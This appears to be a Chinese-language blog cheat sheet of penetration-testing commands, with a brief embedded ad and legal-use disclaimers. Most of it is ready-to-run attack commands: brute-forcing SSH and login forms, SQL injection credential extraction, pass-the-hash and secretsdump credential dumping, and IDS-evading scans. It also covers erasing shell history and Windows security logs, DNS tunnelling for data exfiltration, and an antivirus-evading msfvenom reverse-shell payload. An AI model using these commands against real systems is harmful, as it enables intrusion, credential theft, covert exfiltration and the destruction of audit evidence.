1. 为什么需要一份黑客命令速查手册?
在网络安全领域,命令行的熟练程度往往决定了一个技术人员的效率上限。我刚入行时,经常遇到这样的困境:明明知道某个功能可以实现,却记不住具体的命令语法;或者在渗透测试过程中,突然需要用到某个工具但忘记了关键参数。这就是为什么每个安全从业者都需要建立自己的命令库。
这份手册不同于网上那些华而不实的"黑客代码大全",我们只收录真正经过实战检验的高频命令。从基础的网络探测到高级的漏洞利用,所有命令都经过我多年红队演练的验证。特别适合以下人群:
- 刚接触网络安全的新手
- 需要快速查阅命令的渗透测试工程师
- 想提升工作效率的系统管理员
重要提示:本手册所有命令仅限合法授权测试使用,请遵守《网络安全法》相关规定。
需要模型API调用? 免费领10W Token,多模型网关一键接入 Claude、DeepSeek 等主流模型。
2. 基础环境配置与工具准备
2.1 Linux系统必备工具链
真正的安全测试工作90%都在Linux环境下完成。以下是必须掌握的软件包安装命令(以Kali Linux为例):
bash复制sudo apt update && sudo apt install -y \
nmap \ # 网络扫描神器
hydra \ # 暴力破解工具
wireshark \ # 流量分析工具
metasploit-framework \ # 漏洞利用框架
sqlmap \ # SQL注入工具
python3-pip # Python环境
安装完成后建议配置命令别名,提升工作效率。编辑~/.bashrc文件添加:
bash复制alias scan='sudo nmap -sV -O -T4'
alias http='python3 -m http.server 8000'
2.2 Windows环境下的替代方案
对于必须使用Windows的场景,这些内置命令非常实用:
cmd复制netstat -ano | findstr LISTEN # 查看开放端口
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 系统信息
wmic product get name,version # 已安装软件清单
推荐安装Windows Terminal替代默认CMD,支持多标签和更好的字体渲染。通过winget安装:
powershell复制winget install Microsoft.WindowsTerminal
3. 网络侦查与信息收集命令
3.1 主机发现与端口扫描
Nmap是网络探测的瑞士军刀,这些组合命令能覆盖90%的场景:
bash复制# 快速扫描(避开防火墙检测)
nmap -sn 192.168.1.0/24 -T4
# 全端口扫描+服务识别
nmap -p- -sV -O -T4 target_ip
# 绕过IDS检测的隐蔽扫描
nmap -f --data-length 24 -D RND:5 target_ip
实战技巧:当遇到防火墙时,可以尝试这些参数组合:
--scan-delay 1s降低扫描速度--source-port 53伪装成DNS流量--data-length 100混淆包特征
3.2 网络流量分析与嗅探
Tcpdump的基础用法:
bash复制# 抓取HTTP流量
sudo tcpdump -i eth0 -A 'tcp port 80'
# 抓取DNS查询
sudo tcpdump -i eth0 -n 'udp port 53'
# 保存流量包供后续分析
sudo tcpdump -w capture.pcap -i eth0
Wireshark的过滤语法示例:
code复制http.request.method == "POST" # 过滤POST请求
tcp.port == 3389 && rdp # 识别RDP流量
dns.qry.name contains "baidu" # 特定域名查询
4. 常见漏洞利用命令实例
4.1 Web应用安全测试
SQL注入检测(使用sqlmap):
bash复制# 基础检测
sqlmap -u "http://target.com/page?id=1" --batch
# 获取数据库名
sqlmap -u "http://target.com/page?id=1" --dbs
# 自动破解管理员密码
sqlmap -u "http://target.com/login" --data="user=admin&pass=*" --level=5
目录遍历检测:
bash复制# 使用dirsearch
python3 dirsearch.py -u http://target.com -e php,asp,aspx,jsp
# 使用ffuf进行内容发现
ffuf -w wordlist.txt -u http://target.com/FUZZ -mc 200
4.2 密码破解实战
Hydra的经典用法:
bash复制# SSH暴力破解
hydra -l root -P passwords.txt ssh://target_ip
# HTTP表单破解
hydra -L users.txt -P pass.txt target_ip http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"
Hashcat破解哈希示例:
bash复制# 破解MD5哈希
hashcat -m 0 hash.txt rockyou.txt
# 破解NTLM哈希
hashcat -m 1000 ntlm_hash.txt -a 3 ?u?d?d?d?d?d
5. 后渗透阶段常用命令
5.1 权限维持与提权
Linux系统提权检查:
bash复制# 查找SUID文件
find / -perm -4000 -type f 2>/dev/null
# 检查可写目录
find / -perm -o=w -type d 2>/dev/null
# 检查计划任务
crontab -l
ls -la /etc/cron*
Windows提权检查:
powershell复制# 查看系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# 检查补丁情况
wmic qfe get Caption,Description,HotFixID,InstalledOn
# 查找可写目录
accesschk.exe -uwqs Users c:\
accesschk.exe -uwqs "Authenticated Users" c:\
5.2 内网横向移动
使用Impacket工具包进行内网渗透:
bash复制# SMB共享枚举
python3 smbclient.py domain/user:password@target_ip
# 传递哈希攻击
python3 wmiexec.py -hashes LMHASH:NTHASH domain/user@target_ip
# 域控信息收集
python3 secretsdump.py domain/user:password@dc_ip
6. 痕迹清理与日志操作
6.1 Linux日志处理
关键日志文件位置:
bash复制/var/log/auth.log # 认证日志
/var/log/syslog # 系统日志
/var/log/apache2/ # Apache日志
/var/log/nginx/ # Nginx日志
日志清理技巧:
bash复制# 删除当前用户的历史记录
history -c && history -w
# 清除lastlog记录
ln -sf /dev/null ~/.bash_history
6.2 Windows日志操作
查看事件日志:
powershell复制Get-EventLog -LogName Security -Newest 50
清除单个日志:
powershell复制Clear-EventLog -LogName Security
7. 防御对抗与反检测
7.1 防火墙绕过技巧
使用ICMP隧道绕过防火墙:
bash复制# 服务端
sudo nping --icmp -c 1 target_ip --data-string "secret"
# 客户端
tcpdump -i eth0 'icmp[icmptype]==icmp-echo' -vv
DNS隐蔽通道示例:
bash复制# 查询数据外传
dig +short TXT encoded-data.example.com
# 使用iodine建立隧道
iodine -f -P password dns.server.com
7.2 反病毒规避方法
二进制文件混淆:
bash复制# 使用UPX加壳
upx -9 original.exe -o packed.exe
# 使用msfvenom生成免杀payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=443 -f exe -e x86/shikata_ga_nai -i 5 -o payload.exe
8. 自动化脚本与效率工具
8.1 Bash自动化脚本示例
端口扫描自动化:
bash复制#!/bin/bash
for ip in $(seq 1 254); do
nmap -Pn -p 22,80,443 192.168.1.$ip | grep "open" &
done
wait
批量漏洞检测:
bash复制while read url; do
sqlmap -u "$url" --batch --crawl=1
done < targets.txt
8.2 Python辅助工具
简易HTTP服务器:
python复制import http.server
import socketserver
PORT = 8080
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print(f"Serving at port {PORT}")
httpd.serve_forever()
网络嗅探脚本:
python复制from scapy.all import *
def packet_callback(packet):
if packet[TCP].payload:
print(f"[*] {packet[IP].src}:{packet[TCP].sport} -> {packet[IP].dst}:{packet[TCP].dport}")
print(f"{bytes(packet[TCP].payload)}\n")
sniff(filter="tcp port 80 or tcp port 21 or tcp port 22", prn=packet_callback, store=0)
9. 实战经验与常见问题
9.1 命令执行失败的排查思路
当命令没有按预期工作时,按这个顺序检查:
- 权限问题:是否忘记加sudo?
- 路径问题:命令是否在PATH中?
- 依赖问题:是否缺少动态库?
- 语法问题:参数顺序是否正确?
- 环境问题:是否在正确的目录下执行?
9.2 保持命令更新的方法
安全工具更新极快,建议每周执行:
bash复制# Kali Linux更新
sudo apt update && sudo apt full-upgrade -y
# Python工具更新
pip3 list --outdated | cut -d' ' -f1 | xargs -n1 pip3 install -U
# Git项目更新
find ~/tools -name ".git" -type d | xargs -I{} git -C {}/.. pull
10. 法律合规与道德准则
在结束之前必须强调:所有这些命令和技术都应在合法授权的范围内使用。我强烈建议:
- 永远获取书面授权后再进行测试
- 不要保留任何未经授权的数据
- 发现漏洞后及时报告给相关方
- 遵守《网络安全法》和《数据安全法》的规定
真正的黑客精神是建设而非破坏。多年来我见证过太多人因为越界而付出惨痛代价。技术本身无罪,但使用技术的人需要为自己的行为负责。希望这份手册能帮助你在合法的道路上精进技术,成为守护网络空间的白帽卫士。
